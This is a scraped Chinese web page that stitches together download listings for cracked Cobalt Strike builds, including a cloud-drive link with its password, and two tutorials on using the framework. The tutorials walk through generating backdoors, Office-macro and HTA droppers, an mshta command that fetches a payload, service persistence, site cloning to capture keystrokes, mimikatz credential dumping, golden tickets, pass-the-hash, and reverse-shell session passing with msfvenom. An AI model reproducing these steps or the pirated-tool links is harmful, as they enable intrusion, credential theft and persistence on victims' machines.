精华内容
下载资源
问答
  • cobaltstrike中文版.zip

    2021-05-17 14:27:08
    cobaltstrike中文版.zip
  • 这个是奇安信大佬们翻译过来的CobaltStrike4.0用户手册 开源免费
  • CobaltStrike4.0用户手册_中文翻译.pdf
  • 网上收集到的CobaltStrike4.0中文实用手册,该资源仅供交流学习实用,请勿用于其它用途,该资源仅供交流学习实用,请勿用于其它用途。解压密码为123321
  • 默认的CobaltStrike内存在多处流量特征,在马儿与服务端建立连接时进行流量交互.此间存在多处可疑特征已被各大杀软记录在册 如:卡巴斯基,诺顿,迈克菲等,但国内杀软并无此功能. 所以在客户端进行免杀的同时服务端在...
  • cobaltstrike中文支持.zip

    2019-05-26 19:15:44
    cobaltstike 中文支持版本
  • cobaltstrike4.3.zip

    2021-05-26 14:40:45
    此版本为20210317版本,当前为最新版本.
  • CobaltStrike4.4.zip

    2021-09-15 01:28:14
    CobaltStrike4.4
  • cobaltstrike最新汉化版
  • Cobalt Strike 4.2.zip

    2021-05-05 12:33:21
  • CobaltStrike4.3指南手册.pdf
  • Cobalt Strike下载

    2019-04-09 20:44:06
    cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。
  • 安装 cobaltstrike4.2
  • CobaltStrike4.1

    2021-03-10 14:43:07
    CobaltStrike4.1
  • CobaltStrike 4.1中文版的安装使用

    千次阅读 多人点赞 2020-12-30 16:11:40
    1. CobaltStrike简介 CobaltStrike是一款后渗透神器,有个故事是这么说的自从用了CobaltStrike神器后,妈妈再也不用担心我搞渗透了。专业人士亲切的称它为CS,于其说它是一个工具不如说它是一个集成的平台 ...

    目录

    1. CobaltStrike简介

    2.CobaltStrike的安装

    2.1 cs文件分析

    2.2 cobaltstrike启动

    3. cobaltstrike使用

    3.1 cs模块

    3.2 创建监听器Listener

    3.3 CobaltStrike主机上线

    3.3.1 HTML Appliaction

    3.3.2 MS Office Macro

    3.3.3 Payload Generator

    3.3.4 Windows Executable

    3.3.5 Windows Executable(S)

    3.3.6 Windows Executable & Windows Executable(S)

    3.4 Attacks钓鱼

    3.4.1 克隆网站

    3.4.2 信息收集

    3.5 View视图

    3.6 Beacon会话操作

    3.6.1 Interact(互动) 

    3.6.2 Access(执行) 

    3.6.3 Pivoting(中转)

     3.6.4 Explore(目标)

    4. CobaltStrike常见命令


     

    1. CobaltStrike简介

    CobaltStrike是一款后渗透神器,有个故事是这么说的自从用了CobaltStrike神器后,妈妈再也不用担心我搞渗透了。专业人士亲切的称它为CS,于其说它是一个工具不如说它是一个集成的平台,可以同时上线多个用户。使用Cobalt Strike来协调红队的分散行动,使用一个或更多的远程主机分阶段的搭建CS的基础环境,启用服务器并让多个团队成员于其建立连接。

    团队成员上线同一个服务端,会在团队成员内:

    • 使用相同的会话

    • 分享靶机数据

    • 通过一个共享的事件日志交流

    作为红队使用CS客户端也可能会连接多个CS服务端,当连接多个服务端时会在Cobalt Strike窗口底部出现切换条允许在活跃的CS服务端之间切换。每一个服务端都会有一个按钮在窗口底部出现。

    CobaltStrike为什么称之为神器,因为它集成了端口转发、服务扫描、权限提升,多功能后门木马生成(包含Windows exe、Windows dll、C、Java、office宏病毒),钓鱼攻击等等强大的功能。

    2.CobaltStrike的安装

    本文在Linux系统上安装,安装很简单,配置java环境,将CobaltStrike安装包上传至安装目录下,解压即可。

    本人在Kali上安装,Kali自带Java环境,但自带的环境会存在很多的问题,保险起见建议删除更新kali自带的Java环境,具体方法请自行百度,本文不赘述。

    上传好安装包后,执行解压命令,本人得到的安装包是rar格式,需要在kali安装rar解压,这样CobaltStrike就算是安装好了。

    rar  -x  cobaltstrike4.1.rar 

    cd cobaltstrike4.1 # 进入该目录

    2.1 cs文件分析

    查看cs包内文件,CobaltStrike主要文件和功能介绍如下:

    1. agscript:扩展应用的脚本

    2. c2lint:该文件主要检查profile的错误和异常

    3. teamserver:服务端启动程序

    4. cobaltstrike.jar:CobaltStrike主要核心程序

    5. cobaltstrike.auth:用于客户端和服务端认证的文件(建议自己有时间可以查看一下cs的源码)

    6. cobaltstrike.store:密钥证书存放文件

    主要目录功能介绍如下:

    1. data:用于保存当前TeamServer的数据

    2. logs:日志文件(web日志、Beacon日志、截图日志、下载日志、键盘记录日志等等)

    3. third-party:第三方工具目录

    4. AggressorScripts-master:插件目录

    2.2 cobaltstrike启动

    启动服务端:

    ./teamserver  192.168.204.135  123456 # 该ip地址为服务端IP地址,而后是连接密码

    后台运行,关闭终端依旧运行:nohub ./teamserver 192.168.204.135 123456 &

    注意:cs默认监听端口为50050,可以打开teamserver文件,修改端口

     

    启动客户端:

    ./cobaltstrike 

     使用客户端连接服务端:

    在windows使用客户端连接:

    使用文件cobaltstrike.bat

    只需要双击即可

    3. cobaltstrike使用

    3.1 cs模块

    1. New connection:新建连接窗口
    2. Preferences:偏好,设置cobaltstrike外观
    3. Visualization:可视化,输出结果展示(将主机以不同的权限展示出来) 
    4. VPN Interfaces:设置VPN接口
    5. Listeners:创建监听器
    6. Script Interfaces:查看加载cna脚本
    7. Close:关闭

    3.2 创建监听器Listener

    CobaltStrike的内置监听器为Beacon,外置监听器为Foreign。CobaltStrike的Beacon支持异步通信和交互式通信。

    建立监听:

    Listeners---->下方弹出区域点击Add

    name:监听器名字

    payload:payload类型

    HTTP Hosts:shell反弹主机,是服务端IP

    HTTP Host(Stager):控制HTTP Beacon的HTTP Stager的主机,当此payload与需要显示的stager

    HTTP Port(C2):C2监听的端口

    在payload字段内有8种不同的类型可供选择:

    在以前的版本中该选项如下:

    1. windows/beacon_dns/reverse_dns_txt
    2. windows/beacon_dns/reverse_http
    3. windows/beacon_tcp/bind_tcp
    4. windows/beacon_http/reverse_http
    5. windows/beacon_https/reverse_https
    6. windows/beacon_smb/bind_pipe
    7. windows/foreign/reverse_http
    8. windows/foreign/reverse_https
    9. windows/foreign/reverse_tcp

    需要了解beacon为内部监听器,在目标主机执行相关payload会向cd反弹一个shell;foreign主要是提供给外部使用的一些监听器,使用cs派生一个MSF的shell回来就需要使用外部监听器;在4.1版本中external c2是一个规范,允许第三方程序充当cs的beacon有效载荷的通讯层。

    3.3 CobaltStrike主机上线

    要想利用payload让主机上线,就要先清除cs可生成的后门文件,如下图:

    据上图Attacks功能模块,可利用Packages生成各类后门,详情如下:

    1. HTML Appliaction:生成一个恶意的HTML Appliacton木马,后缀为'.hta'。通过HTML调用其他语言的应用组件进行攻击,提供可执行文件。

    2. MS Office Macro:生成office宏病毒文件。

    3. Payload Generator:生成各种编程语言的payload(包含C、C#、COM Scriptlet、Java、Perl、Powershell、Python、Ruby、VBA)

    4. Windows Executable:生成32位或64位的exe、dll可执行文件

    5. Windows Executable(S):用于生成一个exe可执行文件,包含Beacon的完整payload,与4相比,该模块额外提供了代理功能,以便在比较严苛德环境下进行渗透测试。并且支持Powershell脚本,用于将Stageless Payload注入内存。

    3.3.1 HTML Appliaction

    HTML Appliaction会生成‘.hta’类型的文件。hta为HTML Appliaction的缩写,软件开发的新概念,将HTML保存成hta格式便是一个独立的软件,其有三种类型的后门,本人在实验中只有Powershell能测试成功,另两种方式会提示当前的页面脚本发生错误。实验步骤如下:

    生成后门文件:

     利用文件下载将后门下载至目标主机:

     

     执行mshta上线:

    命令:mshta http://192.168.204.135/download/file.ext

    至于其他两个失败的测试就直接将生成的后门文件复制到靶机上执行吧,只执行其中一个即可。

    3.3.2 MS Office Macro

    该程序包生成的是一个Microsoft Office的宏文件并提供宏嵌入Microsoft Word或Microsoft Execl的说明。

    选择监听器点击生成器

    根据cobaltstrike提示点击Copy Macro

    然后新建word,并打开编辑,点击试图,然后点击宏,例子是已经保存后的宏,新建只需输入宏名即可。

    将清除里面的代码,复制CobaltStrike生成的代码,保存退出

    在实际利用时只需将文档发送给他人,对方只需要双击打开该word,在开启宏的前提下,CS就会收到反弹回来的shell,进程名是rundll32.exe

     

    office宏

    百度:译自英文单词Macro。宏是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成宏,当在工作时,就可以直接利用事先编好的宏自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。

    word使用宏:开启和禁用(文件——>选项——>信任中心——>信任中心设置)

    本人电脑实际上是禁用了宏,但是在实验的时候还是成功获取到了shell,纳闷。

    3.3.3 Payload Generator

    payload生成器,该程序包以多种格式导出Cobalt Strike的stager。

    本人测试使用powershell,懒惰的本人懒得去搞靶机环境

    使用windows环境执行该payload

    执行ps1脚本会产生一个异常

    这是在默认情况下系统会禁止执行脚本,需要手动开启powershell脚本功能:

    以管理员身份启动powershell,执行以下命令 

    Set-ExecutionPolicy RemoteSigned

    免数字签名执行脚本

    set-executionpolicy Bypass

    然后再执行payload

    3.3.4 Windows Executable

    该程序包生成一个windows可执行Artifact,用于传送一个payload stager,该程序包提供多种输出选项。

    使用该模块会生成一个exe可执行文件,可响应service control manager命令。普通的exe和服务器调用的exe存在区别, 利用Windows Service EXE生成的exe文件才能作为服务器自启动的执行文件,而Windows EXE不能作为服务器自启动程序,因此不能响应service control manager。Windows DLL会派生一个对应的进程,并将监听器迁移至其上,此功能与rundll32.exe兼容,利用命令行加载DLL。

    3.3.5 Windows Executable(S)

    该程序包直接导出Beacon,是开发者写好的32/64位DLL,是一个不使用stager的可执行文件,直接与监听器建立连接传输数据和执行命令。不使用stager的payload Artifact被叫做无阶段的Artifact。该程序包也有powershell选项来导出Bescon作为powershell脚本或者使用raw选项导出与位置无关的Beacon代码。

    3.3.6 Windows Executable & Windows Executable(S)

    这两个程序包直接用于生成可执行的exe或dll。但是Windows Executable是生成的Stager类型的马,而Windows Executable(S)生成的是Stageless类型的马,这两个类型的区别在于:

    1. Stager是分阶段传送Payload,Stager马在靶机上执行后会连接服务端下载真正的shellcode,我个人理解是依据分块传输来理解这个分阶段的。因为很多场景对于加载进内存并成功利用后执行的数据大小存在严格限制,所以就需要利用分阶段传输。如果不需要分阶段传输可在C2的扩展文件里面把host_stage选项设置为false。
    2. Stageless则是一个大马,后续不需要向服务端请求shellcode。所以这种方法生成的木马会比Stager马体积要大很多。这种大马有助于避免被溯源到,如果开启了分阶段传送,任何人都能连接到你的C2服务器请求payload,并分析payload中的配置信息。

    Windows Executable(S)相比于Windows Executable,其中包含Beacon的完整payload,不需要阶段性的请求,该模块额外提供了代理设置,以便在较为苛刻的环境中进行渗透测试。该模块还支持powershell脚本,可将Stageless Payload注入内存。

    注意:生成的Windows Service EXE生成的木马,直接双击是不会返回session,需要以创建服务的方式启动,才会返回session。

    使用Windows Service EXE生成木马,需要利用到sc.exe(详细说明

    #注意,等号(=)后面要有空格,autoRunBackDoor为服务名,start为启动模式为自动
    sc create autoRunBackDoor binPath= "cmd.exe /c C:\users\administrator\desktop\cs.exe" start= auto DisplayName= autoRunBackDoor
    #开启某个系统服务
    sc start autoRunBackDoor 
    #停止某个系统服务
    sc stop autoRunBackDoor 
    # 删除某个系统服务
    sc delete service_name

    3.4 Attacks钓鱼

    点击模块Attacks中存在Web Drive-by功能,该功能通尝被翻译为网站钓鱼攻击。

    功能简介: 

    1. web服务管理:对开启的web服务进行管理
    2. 克隆网站:克隆网站,目的主要是制作类似网站骗取用户敏感信息
    3. 文件下载:提供本地文件下载,使靶机从本地下载文件
    4. Scripted Web Delivery(S):基于Web的攻击测试脚本,自动生成可执行的payload,使用模块来生成powershell命令反弹shell
    5. 签名Applet攻击:启动一个Web服务以提供自签名Java Applet的运行环境
    6. 智能攻击:自动监测Java版本并利用已知的exploits绕过security
    7. 信息搜集:用来获取一些系统信息

    3.4.1 克隆网站

    该模块用来克隆网站,欺骗用户获取用户键盘记录。

    查看键盘记录,这个应该类似于BurpSuite,百度的登陆信息看不到。

    3.4.2 信息收集

    该模块用来收集系统和浏览器信息

    使用该链接会自动跳转到百度,CS可以获取到目标系统和浏览器的信息。

    3.5 View视图

    该模块主要是展示功能,

    视图功能模块详细解释:

    1. Applications:显示受害者机器的应用信息

    2. Credentials:显示受害者及其的凭证信息,通过hashdump和mimikatz获取的密码会保存在这儿

    3. Downloads:查看从受害主机上下载的文件

    4. Event Log:可以看到事件日志,清楚的看到系统的事件,还可以提供团队成员聊天

    5. Keystrokes:查看键盘记录

    6. Proxy Pivots:查看代理信息

    7. Screenshots:查看屏幕截图

    8. Script Console:在这里可以加载各种脚本以增强功能

    9. Targets:查看目标

    10. Web Log:查看web日志

    3.6 Beacon会话操作

    选中Beacon右击,会出现一个列表栏

    3.6.1 Interact(互动) 

    中文版的这里是进入Beacon,就是可以利用Beacon执行命令的窗口。

    3.6.2 Access(执行) 

    该模块的主要功能如下图:

    在该模块里存放的是常用的功能,提取Hash、dump明文密码、提权等。

    1. 转储HASH

    除了使用鼠标一键获取外,也可以在命令行输入hashdump

    2. Run Mimikatz(获取明文密码)

    使用Mimikatz获取明文密码,需要注意的是Windows10是未存储明文密码,只适用于Windows7或者Windows2008以前的版本。

    在试图模块凭证信息处会保存抓取的明文密码记录。 

              可在此处修改密码

    3. (Elevate)提权

    当获取的权限不足以让我们继续渗透下去时就要使用提权工具对用户进行权限提升,靶机实验建议使用版本较低的Windows环境。

    默认是存在三个提权payload(MS14-058、uac-dll、uac-token-duplication)可以使用,本人的CS是曾经使用的时候到如果其他的payload。如果你也想自己加载提权脚本,可以将自己获取到的提权工具包导入进去。

    导入提权脚本,在下图可以看到本人以前加载的工具脚本:

     在实验环境中是对一台低权限的win2008R2系统进行权限提升操作,使用MS14-058进行提权,提权成功就会反弹回一个beacon。

     

    3.6.3 Pivoting(中转)

    1. 建立Socks4代理

    当被控主机是一台边界机时,如果要继续渗透,打透内网的话,就需要在CS上将此主机作为跳板。

    建立Socks代理只需要设置一个空置的端口即可

     

     

    代理设置好后,IP为CS服务端的IP,端口是55074.

    在视图模块-->代理信息可查看Socks4代理信息,可在浏览器设置代理

     点击Tunnel,可以获取一个MSF代理

     3.6.4 Explore(目标)

    1. Process List(进程列表)

    在上截图中下面有一排功能键,Inject:将Beacon注入进程Log Keystrokes为键盘记录Steal Token为窃取运行指定程序的用户令牌。

    1.1 Inject

    选择Inject按钮,选择监听器,随后CobaltStrike会反弹目标靶机的一个新的会话,这个会话就是成功注入到某个正常进程的Beacon会话,注入之后,除非那个进程被杀死,否则CS是一直能与该主机保持通信。

    1.2 Log Keystrokes

    选择任意一个进程点击Log Keystrokes,即可监听该主机的键盘记录,监听的是所有的键盘记录,不仅仅只是选中的进程。键盘监听记录,也可以直接输入keylogger。

    正常情况下此时就可以看见键盘记录了。 

    1.3 Brower Pivot(浏览器代理)

    使用该功能,是将会话注入到浏览器的进程中。然后在本地浏览器中设置该代理,可以直接使用本地浏览器访问目标机器浏览器已经登陆的网站。

    1.4 Golden Ticket(黄金票据)

    黄金票据:黄金票据是伪造票据授权(TGT),也被称为认证票据。在域控制器已被攻陷,攻击者持久控制域控制器。黄金票据主要是利用Kerberos协议缺陷和域中krbtgt账号的信息,可生成任意TGT,该TGT可用于当前域中Kerberos认证的任何服务。攻击者只需要保存krbtgt账号中的信息生成golden ticket注入内存当中,即可拥有权限,该票据的有限期是十年。

    获取黄金票据的前提是已经获得了krbtgt用户的hash(cb1ea55e9b54123dfca9b2fd76826089)

     点击当前获取的主机

    点击后弹出对话框,填入已知的信息

            点击Bulid后的结果如下图,在cs内还是利用了mimikatz这个工具自动执行了相关命令:

     验证是否成功

    1.5 MAke token(凭证转换)

    该模块主要是使用获取到的域内其他的账号密码,利用此模块生成令牌具有指定用户身份的作用

     输入已经得到的域账号密码

     1.6 端口扫描

    端口扫描有图形界面也有命令行

    portscan 192.168.1.0/24 22,445,1433,3306

    使用图形界面

    扫描完了以后会直接在命令界面返回结果,可在视图菜单

    1.6 hash传递或SSH远程登陆

    在Windows系统中,在获取了机器的账号密码或者hash,都可以进行远程连接,当然前提是目标开放了445端口,然后利用CS远程连接开启一个CS的seesion。可以用以下方式远程连接:psexec、psexec64、psexec_psh、winrm和winrm64。

    已经得到主机Windows7 的密码,现在想hash传递监听登陆域控主机Windows2008R2主机

    获取Windows7主机的hash并且使用mimikatz获取明文(查看凭据信息内的数据):

    使用端口扫描的信息会发现的主机会在目标内存在

     使用以获取到的hash和密码远程连接域控主机

    成功后会返回一个会话 

    如果是内网机器不能出网,需要设置中转,对于Linux使用SSH公私钥进行登陆。(先放着以后再做这个实验)

    4. CobaltStrike常见命令

    BeaconCommands
    ===============
        Command                   Description
        -------                   -----------
        browserpivot              注入受害者浏览器进程
        bypassuac                 绕过UAC
        cancel                    取消正在进行的下载
        cd                        切换目录
        checkin                   强制让被控端回连一次
        clear                     清除beacon内部的任务队列
        connect                   Connect to a Beacon peerover TCP
        covertvpn                 部署Covert VPN客户端
        cp                        复制文件
        dcsync                    从DC中提取密码哈希
        desktop                   远程VNC
        dllinject                 反射DLL注入进程
        dllload                   使用LoadLibrary将DLL加载到进程中
        download                  下载文件
        downloads                 列出正在进行的文件下载
        drives                    列出目标盘符
        elevate                   尝试提权
       execute                   在目标上执行程序(无输出)
        execute-assembly          在目标上内存中执行本地.NET程序
        exit                      退出beacon
        getprivs                  Enable system privileges oncurrent token
        getsystem                 尝试获取SYSTEM权限
        getuid                    获取用户ID
        hashdump                  转储密码哈希值
        help                      帮助
        inject                    在特定进程中生成会话
        jobkill                   杀死一个后台任务
        jobs                      列出后台任务
        kerberos_ccache_use       从ccache文件中导入票据应用于此会话
        kerberos_ticket_purge     清除当前会话的票据
        kerberos_ticket_use       从ticket文件中导入票据应用于此会话
        keylogger                 键盘记录
        kill                      结束进程
        link                      Connect to a Beacon peerover a named pipe
        logonpasswords            使用mimikatz转储凭据和哈希值
        ls                        列出文件
        make_token                创建令牌以传递凭据
        mimikatz                  运行mimikatz
        mkdir                     创建一个目录
        mode dns                  使用DNS A作为通信通道(仅限DNS beacon)
        mode dns-txt              使用DNS TXT作为通信通道(仅限D beacon)
        mode dns6                 使用DNS AAAA作为通信通道(仅限DNS beacon)
        mode http                 使用HTTP作为通信通道
        mv                        移动文件
        net                       net命令
        note                      备注      
        portscan                  进行端口扫描
        powerpick                 通过Unmanaged PowerShell执行命令
        powershell                通过powershell.exe执行命令
        powershell-import         导入powershell脚本
        ppid                      Set parent PID forspawned post-ex jobs
        ps                        显示进程列表
        psexec                    Use a service to spawn asession on a host
        psexec_psh                Use PowerShell to spawn asession on a host
        psinject                  在特定进程中执行PowerShell命令
        pth                       使用Mimikatz进行传递哈希
        pwd                       当前目录位置
        reg                       Query the registry
        rev2self                  恢复原始令牌
        rm                        删除文件或文件夹
        rportfwd                  端口转发
        run                       在目标上执行程序(返回输出)
        runas                     以另一个用户权限执行程序
        runasadmin                在高权限下执行程序
        runu                      Execute a program underanother PID
        screenshot                屏幕截图
        setenv                    设置环境变量
        shell                     cmd执行命令
        shinject                  将shellcode注入进程
        shspawn                   生成进程并将shellcode注入其中
        sleep                     设置睡眠延迟时间
        socks                     启动SOCKS4代理
        socks stop                停止SOCKS4
        spawn                     Spawn a session
        spawnas                   Spawn a session as anotheruser
        spawnto                  Set executable tospawn processes into
        spawnu                    Spawn a session underanother PID
        ssh                       使用ssh连接远程主机
        ssh-key                   使用密钥连接远程主机
        steal_token               从进程中窃取令牌
        timestomp                 将一个文件时间戳应用到另一个文件
        unlink                    Disconnect from parentBeacon
        upload                    上传文件
        wdigest                   使用mimikatz转储明文凭据
        winrm                     使用WinRM在主机上生成会话
        wmi                       使用WMI在主机上生成会话
        argue                     进程参数欺骗

    本文参考

    谢公子博客:https://xie1997.blog.csdn.net/article/details/89489609

    A-Team出品:《Cobalt Strike 4.0 手册翻译》

    展开全文
  • cobaltstrike4.2.8.zip

    2021-05-28 17:52:04
    cobaltstrike4.2.8完美版
  • CobaltStrike4.0用户手册_中文翻译-带书签
  • 很牛逼,Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
  • Cobalt Strike4.0安装包(内附中文版)

    万次阅读 热门讨论 2020-03-21 16:34:19
    1.什么是 Cobalt Strike Cobalt Strike 是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁 者的后渗透行动。 Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与...

    1.什么是 Cobalt Strike
    Cobalt Strike 是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁
    者的后渗透行动。

    Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。本期“安仔课堂”,ISEC实验室的陈老师带大家实战操作Cobalt Strike神器的使用。

    2.使用

    agscript拓展应用的脚本

    c2lint 用于检查profile的错误异常

    teamserver服务端程序

    cobaltstrike,cobaltstrike.jar客户端程序(java跨平台)

    logs目录记录与目标主机的相关信息

    update,update.jar用于更新CS

    third-party第三方工具

    启动团队服务器 ip为本机ip ip后面为你的密码

     根据自己启动时的配置连接客户端

    目前已汉化,去暗桩,功能应该没问题,windows,linux,mac os均以测试运行流畅。

     

    mac测试结果如上,winodws的兼容性就不用再去测试了吧。

    链接: https://pan.baidu.com/s/1JGyB4Ue24pXCZbYVbxp5SA  密码: kn59  有点累不想写,就这样吧。

    具体使用方法懒得长篇大论了,安装包内附上手册。 

     

     

    展开全文
  • 安装教程

    一、CS简单介绍

    Cobalt Strike是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。
    分为服务器和客户端,方便团队合作。

    个人理解:
    cs服务器部署在公网控制着受害者主机,而攻击者可以直接访问cs服务器进而控制受害主机,不用再通过端口转发使用msf控制受害主机,简单方便!
    在这里插入图片描述

    二、安装启动教程

    环境要求
    1、客户端,服务端都需要Java环境
    2、服务端必须安装在Linux系统上

    示例:
    cs服务端:kaili2020
    cs客户端:win10

    cs服务端安装启动

    原版未汉化下载 cs4.0 百度云盘:https://pan.baidu.com/s/1k4GY0IAHzdkd6PysYFxe5w,提取码:rymo
    汉化版放在了我的知识星球与我的资源中

    下载完cs4.0之后,将文件夹复制到 kali
    执行teamserver文件,即可安装启动cs服务端

    ./teamserver 192.168.184.145(kali的IP) 123(密码随便设)
    
    

    如下图所示即是成功启动 cs 服务端
    在这里插入图片描述
    cs客户端安装启动
    双击cs4.0文件夹中的 cobaltstrike.exe 即可成功启动cs
    在这里插入图片描述
    host:cs服务端地址
    port:端口默认不变
    user:用户名随便写
    Password:123(服务端启动时输入的密码)
    之后点击Connect即可
    在这里插入图片描述
    cs客户端成功启动后如下图所示
    在这里插入图片描述

    三、Cobalt Strike 菜单介绍

    1、Cobalt Strike

    New Connection      #新建连接,支持连接多个服务器端
    Preferences         #设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录
    Visualization       #主要展示输出结果的视图
    VPN Interfaces      #设置VPN接口
    Listenrs            #创建监听器
    script Manager      #脚本管理,可以通过Aggressorscripts脚本来加强自身,能够扩展菜单栏,Beacon命令行,提权脚本等
    close               #退出连接
    

    2、View

    Applications         #显示受害主机的应用信息
    Credentials          #显示所有以获取的受害主机的凭证,如hashdump、Mimikatz
    Downloads            #查看已下载文件
    Event Log            # 主机上线记录以及团队协作聊天记录
    Keystrokes           #查看键盘记录结果
    Proxy Pivots         #查看代理模块
    Screenshots          #查看所有屏幕截图
    Script Console       #加载第三方脚本以增强功能
    Targets              #显示所有受害主机
    Web Log              #所有Web服务的日志
    

    3、Attacks
    Packages:

    HTML Application       #生成(executable/VBA/powershell)这三种原理实现的恶意木马文件
    MS Office Macro        #生成office宏病毒文件
    Payload Generator      #生成各种语言版本的payload
    Windows Executable     #生成可执行exe木马
    Windows Executable(S)  #生成无状态的可执行exe木马
    

    Web Drive-by:

    Manage                 #对开启的web服务进行管理
    Clone Site             #克隆网站,可以记录受害者提交的数据
    Host File              #提供文件下载,可以选择Mime类型
    Scripted Web Delivery  #为payload提供web服务以便下载和执行,类似于Metasploit的web_delivery
    Signed Applet Attack   #使用java自签名的程序进行钓鱼攻击(该方法已过时)
    Smart Applet Attack    #动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本(该方法已过时)
    System Profiler        #用来获取系统信息,如系统版本,Flash版本,浏览器版本等
    

    Spear Phish #鱼叉钓鱼邮件

    4、Reporting

    Activity Report                       #活动报告
    Hosts Report                          #主机报告
    Indicators of Compromise              #IOC报告:包括C2配置文件的流量分析、域名、IP和上传文件的MD5 hashes
    Sessions Report                       #会话报告
    Social Engineering Report             #社会工程报告:包括鱼叉钓鱼邮件及点击记录
    Tactics, Techniques, and Procedures   #战术技术及相关程序报告:包括行动对应的每种战术的检测策略和缓解策略
    Reset Data                            #重置数据
    Export Data                           #导出数据,导出.tsv文件格式
    
    

    5、Help

    Homepage            #官方主页 
    Support             #技术支持 
    Arsenal             #开发者 
    System information  #版本信息 
    About               #关于
    

    工具栏说明
    在这里插入图片描述

    四、使用教程

    使用大致流程
    创建团队服务器->客户端连接服务器->创建监听器->生成后门对应监听器->靶机运行后门成功上线->后渗透(提权,内网漫游,域渗透等)

    4.1 Cobalt Strike ——Webshell上线CS自动提权

    1、创建监听器
    如下图所示
    在这里插入图片描述
    之后点击添加
    在这里插入图片描述
    在这里插入图片描述
    出现下图弹窗则说明监听器设置成功,并且正在监听
    在这里插入图片描述
    2、生成木马
    按下图所示生成Windows Executable后门木马
    在这里插入图片描述
    选择已生成好的监听器
    在这里插入图片描述
    勾选X64:目标系统是64位的话需要勾选
    在这里插入图片描述
    将生成的木马保存在电脑中
    在这里插入图片描述
    保存成功后会有如下提示
    在这里插入图片描述
    3、执行木马、反弹会话

    **前提条件:**假设已成功植入webshell,并且通过webshell上传了后门木马artifact.exe
    靶机: win7 IP:192.168.184.141
    使用蚁剑连接webshell
    在这里插入图片描述
    在这里插入图片描述
    执行artifact.exe后门文件,目标靶机成功上线
    在这里插入图片描述
    点击查看视图的图标,可以看到上线主机的信息为普通用户:zhxxxx
    在这里插入图片描述
    4、提权
    CS里面含有自动化的提权
    右键选择第一个,进入命令行模式(具体命令可以查看文章最下面的指令大全)
    在这里插入图片描述
    在这里插入图片描述
    测试执行命令:getuid,稍等一会儿后会显示执行结果
    在这里插入图片描述
    接下来右键选择提权,如下图所示
    在这里插入图片描述
    默认提权的exp就下面这两个,肯定不够,所以得去加载一些提权的插件

    常用的插件地址:
    https://github.com/DeEpinGh0st/Erebus
    https://github.com/rsmudge/ElevateKit
    在这里插入图片描述
    下载其中一个提权插件并保存,本示例下载的是:https://github.com/rsmudge/ElevateKit
    在这里插入图片描述

    如何加载插件?
    如下图所示,选择脚本管理器后,会在下面弹窗提示path
    在这里插入图片描述
    之后选择 插件 并点击打开
    在这里插入图片描述
    之后点击 Unload 上传插件
    在这里插入图片描述
    之后再查看提权的EXP,发现增加了很多
    在这里插入图片描述
    接下来利用 uac-schtasks 的 exp进行提权
    在这里插入图片描述

    点击开始之后,可以通过命令看出正在进行攻击测试了,攻击成功的话会上线一个权限为:SYSTEM 的系统,如下图所示,即是成功提权
    在这里插入图片描述

    4.2 Cobalt Strike ——CS与MSF相互联动传递(Empire)

    #CS->MSF
    cs: spawn XXx
    windows/foreign/reverse_http
    MSF:
    windows/meterpreter/reverse_http
    
    #MSF->CS
    MSF:
    use exploit/windows/local/payload_inject
    windows/meterpreter/reverse_http
    CS:
    windows/beacon_http/reverse_http
    
    

    CS->MSF示例
    前提: CS控制了靶机

    首先启动kali的msf

    msfconsole
    

    在这里插入图片描述
    然后设置一下payload与选项,让kali打开监听,如下图所示,正在监听是由有会话

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_http
    set lhost 192.168.184.145 //kali的地址
    set lport 1234 
    exploit
    

    在这里插入图片描述
    接下来需要去CS中新建一个监听器
    在这里插入图片描述
    监听器创建成功后会如下图所示
    在这里插入图片描述
    接下来选择需要转移的会话,比如是SYSTEM权限的会话
    进入命令行模式
    在这里插入图片描述
    执行命令:

    spawn msf
    

    在这里插入图片描述
    稍等2分钟后,msf能接收到转移来的会话,如下图所示
    在这里插入图片描述
    MSF->CS示例

    前提: MSF控制了靶机

    MSF生成后门 ceshi.exe,并且将后门 ceshi.exe 放在靶机win7上

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.145 lport=2222 -f exe -o ceshi.exe
    

    在这里插入图片描述
    msf打开监听

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.184.145 //kali的地址
    set lport 2222
    exploit
    

    在这里插入图片描述
    此时在靶机win7上执行一下ceshi.exe
    在这里插入图片描述
    msf成功监听到会话
    在这里插入图片描述
    接下来需要转移会话了
    打开cs,创建监听器名字为msf
    在这里插入图片描述

    创建成功后如下图所示
    在这里插入图片描述

    接下来将MSF的会话转移到CS

    background
    use exploit/windows/local/payload_inject
    set payload windows/meterpreter/reverse_http
    set lhost 192.168.184.145 
    set lport 6666  
    set session 1
    exploit
    

    数万命令如下图显示,则说明成功转移会话
    在这里插入图片描述
    在这里插入图片描述
    接下来查看cs客户端,发现新上线了一台msf监听器监听道德会话
    在这里插入图片描述

    指令大全:

    BeaconCommands
    ===============
        Command                   Description
        -------                   -----------
        browserpivot              注入受害者浏览器进程
        bypassuac                 绕过UAC
        cancel                    取消正在进行的下载
        cd                        切换目录
        checkin                   强制让被控端回连一次
        clear                     清除beacon内部的任务队列
